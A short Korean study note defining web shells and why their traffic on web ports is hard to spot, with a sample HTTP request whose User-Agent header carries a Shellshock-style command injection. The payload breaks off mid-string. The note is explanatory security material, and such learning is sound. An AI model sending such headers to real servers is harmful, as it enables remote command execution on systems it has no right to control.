starting point

정의 웹쉘 취약점으로 웹(tcp/80, tcp/443)을 통해 웹서버의 쉘에 접근할 수 있는 취약점 웹쉘 쉘(Shell)이란 운영체제의 커널과 사용자 사이의 인터페이스로 서버에 설정을 변경할 때 사용됨. 웹쉘이란 일반적인 웹을 통해 쉘에 접근하는 공격 웹을 통해 접근하므로 통신 포트는 tcp/80, tcp/443인 것이 일반적이다 웹 통신 포트를 이용한다는 점으로 인해 정상 트래픽과 구분하기 어렵다는 특징이 있다.(스텔스) 패킷 예시 GET /phppath/php.cgi HTTP/1.1 Accept: */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: () { :;};/user/bin/perl -e 'print "Content-ty..